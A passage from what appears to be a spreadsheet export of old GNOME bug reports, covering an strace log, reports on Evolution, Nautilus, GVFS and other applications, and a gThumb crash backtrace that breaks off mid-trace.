old_mmap(NULL 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_ANONYMOUS -1 0) = 0x40015000
read(4 root:x:0:0:root:/root:/bin/bash\n... 4096) = 720
close(4)                                = 0
munmap(0x40015000 4096)                = 0
mkdir(/root/.gnome 0700)             = -1 EEXIST (File exists)
mkdir(/root/.gnome_private 0700)     = -1 EEXIST (File exists)
mkdir(/root/.gnome/accels 0700)      = -1 EEXIST (File exists)
chmod(/root/.gnome_private 0700)     = 0
open(/usr/share/locale/locale.alias O_RDONLY) = 4
fstat(4 {st_mode=S_IFREG|0644 st_size=2265 ...}) = 0
old_mmap(NULL 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_ANONYMOUS -1 0) = 0x40015000
read(4 # Locale name alias data base.\n#... 4096) = 2265
brk(0x8053000)                          = 0x8053000
read(4  4096)                       = 0
close(4)                                = 0
munmap(0x40015000 4096)                = 0
open(/usr/share/i18n/locale.alias O_RDONLY) = -1 ENOENT (No such file or directory)
open(/usr/share/locale/en_US/LC_MESSAGES O_RDONLY) = 4
fstat(4 {st_mode=S_IFDIR|0755 st_size=4096 ...}) = 0
close(4)                                = 0
open(/usr/share/locale/en_US/LC_MESSAGES/SYS_LC_MESSAGES O_RDONLY) = 4
fstat(4 {st_mode=S_IFREG|0644 st_size=44 ...}) = 0
old_mmap(NULL 44 PROT_READ MAP_PRIVATE 4 0) = 0x40015000
close(4)                                = 0
open(/usr/share/locale/en_US/LC_MONETARY O_RDONLY) = 4
fstat(4 {st_mode=S_IFREG|0644 st_size=93 ...}) = 0
old_mmap(NULL 93 PROT_READ MAP_PRIVATE 4 0) = 0x40016000
close(4)                                = 0
open(/usr/share/locale/en_US/LC_COLLATE O_RDONLY) = 4
fstat(4 {st_mode=S_IFREG|0644 st_size=29970 ...}) = 0
old_mmap(NULL 29970 PROT_READ MAP_PRIVATE 4 0) = 0x40564000
close(4)                                = 0
open(/usr/share/locale/en_US/LC_TIME O_RDONLY) = 4
fstat(4 {st_mode=S_IFREG|0644 st_size=508 ...}) = 0
old_mmap(NULL 508 PROT_READ MAP_PRIVATE 4 0) = 0x40017000
close(4)                                = 0
open(/usr/share/locale/en_US/LC_NUMERIC O_RDONLY) = 4
fstat(4 {st_mode=S_IFREG|0644 st_size=27 ...}) = 0
old_mmap(NULL 27 PROT_READ MAP_PRIVATE 4 0) = 0x40018000
close(4)                                = 0
brk(0x8054000)                          = 0x8054000
open(/usr/share/locale/en_US/LC_C</t>
  </si>
  <si>
    <t>baroque</t>
  </si>
  <si>
    <t>EVOLUTION-484793</t>
  </si>
  <si>
    <t>Attachment Reminder dialog error</t>
  </si>
  <si>
    <t>Please describe the problem:
Re: 
&gt; http://www.gnome.org/start/2.20/notes/en/index.html#rnusers-email-and-calendar
&gt; 
&gt; I just happened upon this page and I see that the dialog text says 
&gt; Continue Editing and Send after the user has clicked Send.  This 
&gt; is discontinuous because the last thing the user was doing was sending 
&gt; not editing.
&gt; 
&gt; Therefore the dialog options should be something more like Edit 
&gt; Message and Continue Sending.
Steps to reproduce:
1. 
2. 
3. 
Actual results:
Expected results:
Does this happen every time?
Other information:
Jacob Johnny wrote:
&gt; Can you raise a bug in bugzilla.gnome.org. 
&gt; 
&gt; Thanks
&gt; Johnny
&gt; On Fri 2007-09-28 at 18:00 -0300 MC wrote:
&gt;&gt; I have no idea where to send this but this is the most relevant email 
&gt;&gt; address I found on the website.
&gt;&gt;
&gt;&gt; Re: 
&gt;&gt; http://www.gnome.org/start/2.20/notes/en/index.html#rnusers-email-and-calendar
&gt;&gt;
&gt;&gt; I just happened upon this page and I see that the dialog text says 
&gt;&gt; Continue Editing and Send after the user has clicked Send.  This 
&gt;&gt; is discontinuous because the last thing the user was doing was sending 
&gt;&gt; not editing.
&gt;&gt;
&gt;&gt; Therefore the dialog options should be something more like Edit 
&gt;&gt; Message and Continue Sending.
&gt;&gt;
&gt;&gt; MC
&gt;&gt; _______________________________________________
&gt;&gt; Evolution-list mailing list
&gt;&gt; Evolution-list@gnome.org
&gt;&gt; http://mail.gnome.org/mailman/listinfo/evolution-list
&gt;</t>
  </si>
  <si>
    <t>jjohnny</t>
  </si>
  <si>
    <t>rac</t>
  </si>
  <si>
    <t>GVFS-525779</t>
  </si>
  <si>
    <t>trash backend</t>
  </si>
  <si>
    <t>try to access a .Trash-$USER directory on autofs mounts</t>
  </si>
  <si>
    <t>The bug has been described on https://bugs.launchpad.net/ubuntu/+source/gvfs/+bug/210468
==&gt; syslog &lt;==
Apr 1 14:50:15 guapuraT61 kernel: [18916.265351] SELinux: initialized (dev autofs type autofs) uses genfs_contexts
Apr 1 14:50:16 guapuraT61 automount[10582]: &gt;&gt; /sbin/showmount: can't get address for .Trash
Apr 1 14:50:16 guapuraT61 automount[10582]: lookup(program): lookup for .Trash failed
Apr 1 14:50:16 guapuraT61 automount[10582]: failed to mount /net/.Trash
Apr 1 14:50:16 guapuraT61 automount[10589]: &gt;&gt; /sbin/showmount: can't get address for .Trash-500
Apr 1 14:50:16 guapuraT61 automount[10589]: lookup(program): lookup for .Trash-500 failed
Apr 1 14:50:16 guapuraT61 automount[10589]: failed to mount /net/.Trash-500
Apr 1 14:50:16 guapuraT61 automount[10597]: &gt;&gt; /sbin/showmount: can't get address for .Trash
Apr 1 14:50:16 guapuraT61 automount[10597]: lookup(program): lookup for .Trash failed
Apr 1 14:50:16 guapuraT61 automount[10597]: failed to mount /net/.Trash
Apr 1 14:50:16 guapuraT61 automount[10603]: &gt;&gt; /sbin/showmount: can't get address for .Trash-500
Apr 1 14:50:16 guapuraT61 automount[10603]: lookup(program): lookup for .Trash-500 failed
Apr 1 14:50:16 guapuraT61 automount[10603]: failed to mount /net/.Trash-500
Nautilus attempts to mount and access a .Trash-$USER directory under the autofs mount /net and consequently fails and reports a bunch of errors to /var/log/syslog.
There should be an ignore statement somewhere so that nautilus will ignore/not create the .Trash-$USER directory on read-only directories such as nfs shares that have been exported read-only and consequently *not* attempt to use the directory.</t>
  </si>
  <si>
    <t>NAUTILUS-337770</t>
  </si>
  <si>
    <t>uper level button should return to trash: but not to .Trash folder</t>
  </si>
  <si>
    <t>uper level button should return to trash: but not to .Trash folder 
1. i deleted files in several patitions on my usb disk.
2. nautilus trash:
3. i see list of all my deleted files
4. i open one folder
5. I browse subfolders.
6. now i want to get back to list of all folders.
7. i presing several times to uper level but i get only files from current
partion.
I expected that if i started to browse files from Trash: i should come back to
 trash: by pressing uper level button   
Other information:</t>
  </si>
  <si>
    <t>vytautas</t>
  </si>
  <si>
    <t>EVOLUTION-259857</t>
  </si>
  <si>
    <t>Calendar view always defaults to daily</t>
  </si>
  <si>
    <t>Description of Problem:
When viewing my calendar in weekly view I select
another day from the calendar - expecting to get
the next week - the day view for that day appears.
Steps to reproduce the problem:
1. Select weekly view in caledar
2. Click on a day in another week - view
immediatle goes back to daily view.
Expected Results:
The view to stay in weekly mode
How often does this happen? 
Every time
Additional Information:
Fedora Core 2 + 1.5.9 packages from dmalcolm at redhat</t>
  </si>
  <si>
    <t>carl.gherardi</t>
  </si>
  <si>
    <t>GNOME-BLOG-146106</t>
  </si>
  <si>
    <t>Blog Applet</t>
  </si>
  <si>
    <t>GNOME-BLOG</t>
  </si>
  <si>
    <t>Unknown blog type test does not fail safely - patch included</t>
  </si>
  <si>
    <t>Preferences dialog if an unknown blog type is loaded from gconf or selected
from the option menu widget the app will raise an exception because of unset
variables.
Or to get right down to it I saw '#FIXME' in the code and replaced it.  The
comment said to popup a dialog.  I also initialized a few variables to avoid
exceptions from being raised.
Low priority since the only way a user would see this is if they had a busted
gconf entry for the blog type.  However if that happens they will be unable to
correct it via the Preferences dialog since it raises an exception before the
user has a chance to fix it.</t>
  </si>
  <si>
    <t>gnome-blog</t>
  </si>
  <si>
    <t>caleb</t>
  </si>
  <si>
    <t>EMPATHY-460621</t>
  </si>
  <si>
    <t>All accounts are greyed out</t>
  </si>
  <si>
    <t>When clicking on the button or the icon the button changes between Enable or Disable but the icon remain greyed out
I currently have 2 accounts : Salut and Google talk</t>
  </si>
  <si>
    <t>GAZPACHO-169584</t>
  </si>
  <si>
    <t>Gazpacho crashes when trying to load a catalog that it cannot access</t>
  </si>
  <si>
    <t>If the catalog file is not accessible (e.g. read protected) Gazpacho crashes
when trying to load it. 
Steps to reproduce the bug:
1) chmod a-r catalogs/gtk+.xml
2) bin/gazpacho
The following error occurs:
Unable to load catalog file: Unable to open gtk+.xml
Traceback (most recent call last):
  File bin/gazpacho line 64 in ?
    sys.exit(main(sys.argv))
  File /home/enki/src/gazpacho/gazpacho/main.py line 127 in main
    launch(filename)
  File /home/enki/src/gazpacho/gazpacho/main.py line 47 in launch
    gazpacho = application.Application()
  File /home/enki/src/gazpacho/gazpacho/application.py line 35 in __init__
    self._catalogs = catalog.load_all(self)
  File /home/enki/src/gazpacho/gazpacho/catalog.py line 48 in load_all
    if catalog is not None:
UnboundLocalError: local variable 'catalog' referenced before assignment</t>
  </si>
  <si>
    <t>RHYTHMBOX-337999</t>
  </si>
  <si>
    <t>view/toolbar toggle buggy small display mode</t>
  </si>
  <si>
    <t>1. Set RB toolbar pref to Default
2. Toggle View-&gt;Small display to enter small mode
[toolbar is now in icons only mode]
3. Toggle View-&gt;Toolbar to hide toolbar
4. Toggle View-&gt;Toolbar to show toolbar
[Toolbar is not in icons only mode]
The sync toolbar state should special case small display mode.</t>
  </si>
  <si>
    <t>CHRONOJUMP-478176</t>
  </si>
  <si>
    <t>chronojump</t>
  </si>
  <si>
    <t>CHRONOJUMP</t>
  </si>
  <si>
    <t>No two chronojumps in execution</t>
  </si>
  <si>
    <t>Check if chronojump is running and don't allow to do it again (windows quadruple-click)</t>
  </si>
  <si>
    <t>xaviblas</t>
  </si>
  <si>
    <t>SERPENTINE-314386</t>
  </si>
  <si>
    <t>SERPENTINE</t>
  </si>
  <si>
    <t>Error burning non-standard audio files</t>
  </si>
  <si>
    <t>Non-standard audio files convert OK but then the recording stage errors out with:
gobject.GError: All audio files must be stereo 16-bit digital audio with
44100Hz samples
Currently source_to_wav() in audio.py uses the pipeline
decodebin ! audioconvert ! audioscale ! wavenc
This should be changed to:
decodebin ! audioconvert ! audioscale ! audio/x-raw-int channels=2
rate=44100 width=16 ! wavenc</t>
  </si>
  <si>
    <t>serpentine-maint</t>
  </si>
  <si>
    <t>GTK-VNC-667943</t>
  </si>
  <si>
    <t>GTK-VNC</t>
  </si>
  <si>
    <t>whitespace changes broke pod syntax in tools/gvnccapture.c resulting in empty gvnccapture.1</t>
  </si>
  <si>
    <t>Commit 941e91b4 (Death to tabs) broke pod syntax in tools/gvnccapture.c by giving each line of pod documentation 2 leading spaces. As a result running pod2man on tools/gvnccapture.c results in an empty gvnccapture.1 file.</t>
  </si>
  <si>
    <t>gtk-vnc-maint</t>
  </si>
  <si>
    <t>tetromino</t>
  </si>
  <si>
    <t>SYSTEM-MONITOR-126923</t>
  </si>
  <si>
    <t>Ending root-owned process from within gnome system monitor hangs app</t>
  </si>
  <si>
    <t xml:space="preserve">Distribution: Fedora Core release 1 (Yarrow)
Package: gnome-applets
Severity: normal
Version: GNOME2.4.0 2.4.x
Gnome-Distributor: GNOME.Org
Synopsis: Ending root-owned process from within gnome system monitor hangs app
Bugzilla-Product: gnome-applets
Bugzilla-Component: multiload
Bugzilla-Version: 2.4.x
Description:
Description of Problem:
When running System Monitor as a non-root user choosing to end a
root-owned process triggers a root password request after which the app
hangs.
Steps to reproduce the problem:
1. Run gnome-system-monitor as non-root user
2. Choose a root-owned process hit End Process
3. Enter root password app hangs
Actual Results:
App hangs root process does not end.
Expected Results:
Root process ends gnome-system-monitor continues to run.
How often does this happen?
Every time.
Additional Information:
------- Bug moved to this database by unknown@bugzilla.gnome.org 2003-11-13 15:29 -------
The original reporter (jason_brooks@ziffdavis.com) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-applets-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>jason_brooks</t>
  </si>
  <si>
    <t>GNOME-APPLETS-34062</t>
  </si>
  <si>
    <t>Locale problem in slash_applet</t>
  </si>
  <si>
    <t xml:space="preserve">Package:	gnome-applets
Version:	1.2.1-5
Severity:	normal
&gt;Originator: 	 Nils Decker
&gt;Organization:
&gt;Synopsis:	slash_applet uses a  in HTTP/11
&gt;Class:		sw-bug
&gt;Gnome-Libs-Release: gnome-libs-1.2.4
&gt;Environment:
System: Linux atlas.konnet.k 2.2.16-22 #1 Tue Aug 22 16:49:06 EDT 2000 i686 unknown
Architecture: i686
Distribution: Red Hat Version: Red Hat Linux release 7.0 (Guinness)
&gt;Description:
slash_applet send a request to gnotices.gnome.org
GET /gnome-news/rdf HTTP/11
&gt;How-To-Repeat:
LANG=de_DE
&gt;Fix:
LANG=en
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 17:04 -------
This bug was previously known as bug 34062 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=34062
Originally filed under the gnome-applets product and general component.
The original reporter (nde@konnet.com) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component gnome-applets-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>nde</t>
  </si>
  <si>
    <t>EOG-103924</t>
  </si>
  <si>
    <t>File types shouldn't be marked for translation</t>
  </si>
  <si>
    <t>#: libeog/eog-file-selection.c:30
msgid BMP
#: libeog/eog-file-selection.c:31
msgid GIF
#: libeog/eog-file-selection.c:32
msgid ICO
#: libeog/eog-file-selection.c:33 libeog/eog-file-selection.c:48
msgid JPEG
#: libeog/eog-file-selection.c:34 libeog/eog-file-selection.c:51
msgid PNG
#: libeog/eog-file-selection.c:35
msgid PNM
#: libeog/eog-file-selection.c:36
msgid RAS
#: libeog/eog-file-selection.c:37
msgid SVG
#: libeog/eog-file-selection.c:38
msgid TGA
#: libeog/eog-file-selection.c:39
msgid TIFF
#: libeog/eog-file-selection.c:40
msgid XBM
#: libeog/eog-file-selection.c:41 libeog/eog-file-selection.c:54
msgid XPM
The file types above probably shouldn't be translated at all and should
hence also not be marked for translation.
I don't think un-marking strings for translation is affected by string freezes.</t>
  </si>
  <si>
    <t>GTK+-305130</t>
  </si>
  <si>
    <t>Remove unused code in gtktreeview.c</t>
  </si>
  <si>
    <t>Small patch coming up</t>
  </si>
  <si>
    <t>GPERFMETER-164661</t>
  </si>
  <si>
    <t>Visible meter list not properly saved</t>
  </si>
  <si>
    <t>If you open gperfmeter enable and/or disable the visibility of a few meters
quit then reopen gperfmeter only the single CPU meter is initially displayed.
I think I introduced this regression in one of my glib string patches.</t>
  </si>
  <si>
    <t>EVOLUTION-217321</t>
  </si>
  <si>
    <t>Paste doesn't work in the Calender</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 1.0.0.99
Synopsis: Paste doesn't work in the Calender
Bugzilla-Product: Evolution
Bugzilla-Component: Calendar
Description:
I tried to copy something from an e-mail into a calender entry and it
didn't work. I tried to do it two ways the unix way i.e. highlighing
the line and then clicking the center button and the copy/paste way.
Both methods failed.
</t>
  </si>
  <si>
    <t>bjrosen</t>
  </si>
  <si>
    <t>GNOME-APPLETS-457145</t>
  </si>
  <si>
    <t>Update all applets to use GTK 2.12 (about dialog and tooltips)</t>
  </si>
  <si>
    <t>This actually a followup of bug 456944 which does the above only on the mixer applet. Also the patch at bug 456955 is related
Patch coming up</t>
  </si>
  <si>
    <t>GTHUMB-443006</t>
  </si>
  <si>
    <t>crash in gThumb Image Viewer: I clicked on a photo to ...</t>
  </si>
  <si>
    <t>What were you doing when the application crashed?
I clicked on a photo to view it
Distribution: Fedora release 7 (Moonshine)
Gnome Release: 2.18.0 2007-03-23 (Red Hat Inc)
BugBuddy Version: 2.18.0
System: Linux 2.6.21-1.3194.fc7 #1 SMP Wed May 23 22:47:07 EDT 2007 x86_64
X Vendor: The X.Org Foundation
X Vendor Release: 10300000
Selinux: No
Accessibility: Disabled
GTK+ Theme: Glossy P
Icon Theme: Noia
Memory status: size: 457625600 vsize: 457625600 resident: 88907776 share: 13619200 rss: 88907776 rss_rlim: 18446744073709551615
CPU usage: start_time: 1180723516 rtime: 7079 utime: 6772 stime: 307 cutime:0 cstime: 1 timeout: 0 it_real_value: 0 frequency: 100
Backtrace was generated from '/usr/bin/gthumb'
(no debugging symbols found)
Using host libthread_db library /lib64/libthread_db.so.1.
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread 46912496469088 (LWP 16434)]
[New Thread 1139321168 (LWP 16508)]
[New Thread 1138792784 (LWP 16507)]
[New Thread 1138264400 (LWP 16506)]
[New Thread 1074796880 (LWP 16495)]
[New Thread 1074268496 (LWP 16494)]
(no debugging symbols found)
0x0000003b3220d89f in waitpid () from /lib64/libpthread.so.0
#0  0x0000003b3220d89f in waitpid () from /lib64/libpthread.so.0
#1  0x0000003b43c57c97 in uricmp () from /usr/lib64/libgnomeui-2.so.0
#2  
#3  0x0000003b3927381b in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
#4  0x0000003b392a959e in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
#5  0x0000003b3933276d in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
#6  0x0000003b3720afd0 in g_closure_invoke () from /lib64/libgobject-2.0.so.0
#7  0x0000003b3721ad98 in uricmp () from /lib64/libgobject-2.0.so.0
#8  0x0000003b3721b99d in g_signal_emit_valist ()
   from /lib64/libgobject-2.0.so.0
#9  0x0000003b3721bda3 in g_signal_emit () from /lib64/libgobject-2.0.so.0
#10 0x0000003b39430a7e in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
#11 0x0000003b392a8b41 in gtk_container_propagate_expose ()
   from /usr/lib64/libgtk-x11-2.0.so.0
#12 0x0000003b393e739a in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
#13 0x0000003b3933276d in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
#14 0x0000003b3720afd0 in g_closure_invoke () from /lib64/libgobject-2.0.so.0
#15 0x0000003b3721ad98 in uricmp () from /lib64/libgobject-2.0.so.0
#16 0x0000003b3721b99d in g_signal_emit_valist ()
   from /lib64/libgobject-2.0.so.0
#17 0x0000003b3721bda3 in g_signal_emit () from /lib64/libgobject-2.0.so.0
#18 0x0000003b39430a7e in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
#19 0x0000003b392a8b41 in gtk_container_propagate_expose ()
   from /usr/lib64/libgtk-x11-2.0.so.0
#20 0x0000003b392a959e in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
#21 0x0000003b3933276d in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
#22 0x0000003b3720afd0 in g_closure_invoke () from /lib64/libgobject-2.0.so.0
#23 0x0000003b3721ad98 in uricmp () from /lib64/libgobject-2.0.so.0
#24 0x0000003b3721b99d in g_signal_emit_valist ()
   from /lib64/libgobject-2.0.so.0
#25 0x0000003b3721bda3 in g_signal_emit () from /lib64/libgobject-2.0.so.0
#26 0x0000003b39430a7e in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
#27 0x0000003b392a8b41 in gtk_container_propagate_expose ()
   from /usr/lib64/libgtk-x11-2.0.so.0
#28 0x0000003b393edba9 in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
#29 0x0000003b3933276d in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
#30 0x0000003b3720afd0 in g_closure_invoke () from /lib64/libgobject-2.0.so.0
#31 0x0000003b3721ad98 in uricmp () from /lib64/libgobject-2.0.so.0
#32 0x0000003b3721b99d in g_signal_emit_valist ()
   from /lib64/libgobject-2.0.so.0
#33 0x0000003b3721bda3 in g_signal_emit () from /lib64/libgobject-2.0.so.0
#34 0x0000003b39430a7e in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
#35 0x0000003b392a8b41 in gtk_container_propagate_expose ()
   from /usr/lib64/libgtk-x11-2.0.so.0
#36 0x0000003b393a5507 in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
#37 0x0000003b392a959e in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
#38 0x0000003b3933276d in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
#39 0x0000003b3720afd0 in g_closure_invoke () from /lib64/libgobject-2.0.so.0
#40 0x0000003b3721ad98 in uricmp () from /lib64/libgobject-2.0.so.0
#41 0x0000003b3721b99d in g_signal_emit_valist ()
   from /lib64/libgobject-2.0.so.0
#42 0x0000003b3721bda3 in g_signal_emit () from /lib64/libgobject-2.0.so.0
#43 0x0000003b39430a7e in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
#44 0x0000003b392a8b41 in gtk_container_propagate_expose ()
   from /usr/lib64/libgtk-x11-2.0.so.0
#45 0x0000003b392a959e in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
#46 0x0000003b3933276d in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
#47 0x0000003b3720af19 in g_closure_invoke () from /lib64/libgobject-2.0.so.0
#48 0x0000003b3721ad98 in uricmp () from /lib64/libgobject-2.0.so.0
#49 0x0000003b3721b99d in g_signal_emit_valist ()
   from /lib64/libgobject-2.0.so.0
#50 0x0000003b3721bda3 in g_signal_emit () from /lib64/libgobject-2.0.so.0
#51 0x0000003b39430a7e in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
#52 0x0000003b3932cf20 in gtk_main_do_event ()
   from /usr/lib64/libgtk-x11-2.0.so.0
#53 0x0000003b39c31fea in uricmp () from /usr/lib64/libgdk-x11-2.0.so.0
#54 0x0000003b39c3222b in gdk_window_process_all_updates ()
   from /usr/lib64/libgdk-x11-2.0.so.0
#55 0x0000003b392a96d5 in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
#56 0x0000003b3622d1f4 in g_main_context_dispatch ()
   from /lib64/libglib-2.0.so.0
#57 0x0000003b3623002d in uricmp () from /lib64/libglib-2.0.so.0
#58 0x0000003b3623033a in g_main_loop_run () from /lib64/libglib-2.0.so.0
#59 0x0000003b3932d103 in gtk_main () from /usr/lib64/libgtk-x11-2.0.so.0
#60 0x000000000045e0e5 in main ()
Thread 6 (Thread 1074268496 (LWP 16494)):
#0  0x0000003b3220a3a6 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib64/libpthread.so.0
No symbol table info available.
#1  0x0000003b30849a76 in uricmp () from /usr/lib64/gthumb/libgthumb.so
No symbol table info available.
#2  0x0000003b362493a4 in uricmp () from /lib64/libglib-2.0.so.0
No symbol table info available.
#3  0x0000003b322061c5 in start_thread () from /lib64/libpthread.so.0
No symbol table info available.
#4  0x0000003b312d062d in clone () from /lib64/libc.so.6
No symbol table info available.
Thread 5 (Thread 1074796880 (LWP 16495)):
#0  0x0000003b3220a3a6 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib64/libpthread.so.0
No symbol table info available.
#1  0x0000003b30849a76 in uricmp () from /usr/lib64/gthumb/libgthumb.so
No symbol table info available.
#2  0x0000003b362493a4 in uricmp () from /lib64/libglib-2.0.so.0
No symbol table info available.
#3  0x0000003b322061c5 in start_thread () from /lib64/libpthread.so.0
No symbol table info available.
#4  0x0000003b312d062d in clone () from /lib64/libc.so.6
No symbol table info available.
Thread 4 (Thread 1138264400 (LWP 16506)):
#0  0x0000003b3220a3a6 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib64/libpthread.so.0
No symbol table info available.
#1  0x0000003b30849a76 in uricmp () from /usr/lib64/gthumb/libgthumb.so
No symbol table info available.
#2  0x0000003b362493a4 in uricmp () from /lib64/libglib-2.0.so.0
No symbol table info available.
#3  0x0000003b322061c5 in start_thread () from /lib64/libpthread.so.0
No symbol table info available.
#4  0x0000003b312d062d in clone () from /lib64/libc.so.6
No symbol table info available.
Thread 3 (Thread 1138792784 (LWP 16507)):
#0  0x0000003b3220a3a6 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib64/libpthread.so.0
No symbol table info available.
#1  0x0000003b30849a76 in uricmp () from /usr/lib64/gthumb/libgthumb.so
No symbol table info available.
#2  0x0000003b362493a4 in uricmp () from /lib64/libglib-2.0.so.0
No symbol table info available.
#3  0x0000003b322061c5 in start_thread () from /lib64/libpthread.so.0
No symbol table info available.
#4  0x0000003b312d062d in clone () from /lib64/libc.so.6
No symbol table info available.
Thread 2 (Thread 1139321168 (LWP 16508)):
#0  0x0000003b3220a3a6 in pthread_cond_wait@@GLIBC_2.3.2 ()
   from /lib64/libpthread.so.0
No symbol table info available.
#1  0x0000003b30849a76 in uricmp () from /usr/lib64/gthumb/libgthumb.so
No symbol table info available.
#2  0x0000003b362493a4 in uricmp () from /lib64/libglib-2.0.so.0
No symbol table info available.
#3  0x0000003b322061c5 in start_thread () from /lib64/libpthread.so.0
No symbol table info available.
#4  0x0000003b312d062d in clone () from /lib64/libc.so.6
No symbol table info available.
Thread 1 (Thread 46912496469088 (LWP 16434)):
#0  0x0000003b3220d89f in waitpid () from /lib64/libpthread.so.0
No symbol table info available.
#1  0x0000003b43c57c97 in uricmp () from /usr/lib64/libgnomeui-2.so.0
No symbol table info available.
#2  
No symbol table info available.
#3  0x0000003b3927381b in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#4  0x0000003b392a959e in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#5  0x0000003b3933276d in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#6  0x0000003b3720afd0 in g_closure_invoke () from /lib64/libgobject-2.0.so.0
No symbol table info available.
#7  0x0000003b3721ad98 in uricmp () from /lib64/libgobject-2.0.so.0
No symbol table info available.
#8  0x0000003b3721b99d in g_signal_emit_valist ()
   from /lib64/libgobject-2.0.so.0
No symbol table info available.
#9  0x0000003b3721bda3 in g_signal_emit () from /lib64/libgobject-2.0.so.0
No symbol table info available.
#10 0x0000003b39430a7e in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#11 0x0000003b392a8b41 in gtk_container_propagate_expose ()
   from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#12 0x0000003b393e739a in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#13 0x0000003b3933276d in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#14 0x0000003b3720afd0 in g_closure_invoke () from /lib64/libgobject-2.0.so.0
No symbol table info available.
#15 0x0000003b3721ad98 in uricmp () from /lib64/libgobject-2.0.so.0
No symbol table info available.
#16 0x0000003b3721b99d in g_signal_emit_valist ()
   from /lib64/libgobject-2.0.so.0
No symbol table info available.
#17 0x0000003b3721bda3 in g_signal_emit () from /lib64/libgobject-2.0.so.0
No symbol table info available.
#18 0x0000003b39430a7e in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#19 0x0000003b392a8b41 in gtk_container_propagate_expose ()
   from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#20 0x0000003b392a959e in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#21 0x0000003b3933276d in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#22 0x0000003b3720afd0 in g_closure_invoke () from /lib64/libgobject-2.0.so.0
No symbol table info available.
#23 0x0000003b3721ad98 in uricmp () from /lib64/libgobject-2.0.so.0
No symbol table info available.
#24 0x0000003b3721b99d in g_signal_emit_valist ()
   from /lib64/libgobject-2.0.so.0
No symbol table info available.
#25 0x0000003b3721bda3 in g_signal_emit () from /lib64/libgobject-2.0.so.0
No symbol table info available.
#26 0x0000003b39430a7e in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#27 0x0000003b392a8b41 in gtk_container_propagate_expose ()
   from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#28 0x0000003b393edba9 in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#29 0x0000003b3933276d in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#30 0x0000003b3720afd0 in g_closure_invoke () from /lib64/libgobject-2.0.so.0
No symbol table info available.
#31 0x0000003b3721ad98 in uricmp () from /lib64/libgobject-2.0.so.0
No symbol table info available.
#32 0x0000003b3721b99d in g_signal_emit_valist ()
   from /lib64/libgobject-2.0.so.0
No symbol table info available.
#33 0x0000003b3721bda3 in g_signal_emit () from /lib64/libgobject-2.0.so.0
No symbol table info available.
#34 0x0000003b39430a7e in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#35 0x0000003b392a8b41 in gtk_container_propagate_expose ()
   from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#36 0x0000003b393a5507 in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#37 0x0000003b392a959e in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#38 0x0000003b3933276d in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#39 0x0000003b3720afd0 in g_closure_invoke () from /lib64/libgobject-2.0.so.0
No symbol table info available.
#40 0x0000003b3721ad98 in uricmp () from /lib64/libgobject-2.0.so.0
No symbol table info available.
#41 0x0000003b3721b99d in g_signal_emit_valist ()
   from /lib64/libgobject-2.0.so.0
No symbol table info available.
#42 0x0000003b3721bda3 in g_signal_emit () from /lib64/libgobject-2.0.so.0
No symbol table info available.
#43 0x0000003b39430a7e in uricmp () from /usr/lib64/libgtk-x11-2.0.so.0
No symbol table info available.
#44 0x0000003b392a8b41 in gtk_container_propagate_expose ()
